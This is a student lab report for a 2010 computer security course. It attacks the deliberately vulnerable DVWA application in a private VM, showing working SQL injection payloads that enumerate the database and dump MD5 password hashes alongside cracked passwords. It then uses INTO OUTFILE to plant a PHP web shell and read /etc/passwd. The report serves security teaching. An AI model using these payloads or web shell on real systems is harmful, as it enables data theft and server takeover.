A 4

IA 5130, Computer Systems Security, Fall 2010Assignment 4 Muhammad Taibah 000404916

As shown above a new VM was created via VMWare, and booted it from the live CD of DVWA. And after that we ran the (ifconfig) command to find the VM IP address (192.168.243.128), which is a private address assigned by VMWare based on choosing to connect this VM to the network on a NAT Mode.

This should give us the ability to connect to the machine from the host machine, and from the other VMs, but not from the outside world network.

Now, let’s connect to it using the host machine.

1


Nice it is connecting.

Using the provided credentials to connect (admin/password) we log into the application to set the security level to (low) as follows

We can see that a notification box appeared at the end of the page telling us that the security level have been changed to (low).

2


First let’s test using user id (1)

Now let’s start with the second part of the assignment. Performing an SQL injection to see how it works and to determine the underplaying DBMS. This will give us the chance to narrow our search for know flows and bugs that can be used.

Great now we know that the application uses a MySQL DBMS as a back end data source as we can see below.

3


Let’s see all DVWA accounts by using the following SQL injection. We need to add to the SQL statement and comment the rest of it. Based on the extensions of files in the browser (.php) we now know that we can comment the php commands using (#) sign. What we want to do is adding an always true condition so the query returns to us all the users stored in the database (e.g. OR 1=1) which is going to always be true and it will affect the whole SQL condition to be true because of using the logical expression (OR) that only needs one of the sub condition in the clause to be true to return (true) for the whole clause. We will insert the following (1' OR true#) and this should return all users let’s see

4

It worked


This gave us all the users. We know from the view source button that the table that this information is resulting from is called (users), but as mention in the assignment sheet we usually don’t have such privilege in real world. So let’s find the table name by injecting. Before that we need to find the database name so let’s see first how can we get the database name by injecting (1' union select database(),null#) we added null because the query is returning two values so we should determine two values to be returned (null) will return an empty value in the second field

Now that we know that the database name is we can find the table names from the information_schema database by injecting the following (1' union select table_name, null from information_schema.tables where table_schema = 'dvwa' #) this should return to us all the tables names that we have

So the tables we have are (users, and

5

(dvwa) is the database name


guestbook). Now let’s select all users and passwords from the table users by injecting (1' union select password, user from users #)

Now that we have all the users we need to crack the MD5 hashed passwords using for the following list using a website like (http://www.md5decrypter.co.uk/)

First name: 5f4dcc3b5aa765d61d8327deb882cf99 Surname: admin Decrypted password: password

First name: e99a18c428cb38d5f260853678922e03 Surname: gordonb Decrypted password: abc123

First name: 8d3533d75ae2c3966d7e0d4fcc69216b Surname: 1337 Decrypted password: charley

First name: 0d107d09f5bbe40cade3de5c71e9e9b7 Surname: Pablo Decrypted password: letmein

First name: 5f4dcc3b5aa765d61d8327deb882cf99 Surname: smithy Decrypted password: password

With this we finalized the second requirement of the Assignment.

Going back to the first one we need to grab all the underlying Linux system users to do this we can run the command (cat /etc/passwd) into the command line. Now we need to

6

http://www.md5decrypter.co.uk/


find a way to execute this command via php script, and how to print the command out put into the screen.

Testing phpinfo.php we find that it exist publically and it shows the home file directory of the web server (/opt/lampp)

Now we need a place where we can create files. Usually the target is the place where uploaded files are stored. This is due to the fact that there is a permission for the application to control files in that directory.

In the application we find that viewing the source it of uploads it show us the folder (hackable/uploads/) which can also be viewed by injecting the following command

(1' UNION SELECT user,avatar FROM users #)

This means that the application have permission to write files to (/opt/lamp/hackable/uploads) on the server machine.

We can inject the following to write for us a php file in the mentioned directory(1’ UNION SELECT null,ʼ<?php system($_GET [\ʻcmd\ʼ]); ?>ʼ INTO OUTFILE ʻ/opt/lampp/htdocs/hackable/uploads/taibah.phpʼ #ʼ)

By this command we should have a small php file the contains <?php system($_GET [\ʻcmd\ʼ]); ?> which will give us the ability of executing command on the server. Also it forms a backdoor for us which accomplish as well the third requirement of this assignment. Let’s see how it workFirst we insert the injection and submit it

7


And after we should now be able to send the command using GET method, We do this by calling the php file name (taibah.php) and adding to that (?) at the end of it and then the desired

command.

Let’s try to get all the users

8


The user accounts arerootdaemonbinsyssyncgamesmanlpmailnewsuucpproxywww-databackuplistircgnatsnobodylibuuidsyslogdvwasshdmessagebususbmuxpulsertkit

With this we have finished both the first and the extra credit parts of the assignment.

9

A 4

Documents

Transcript of A 4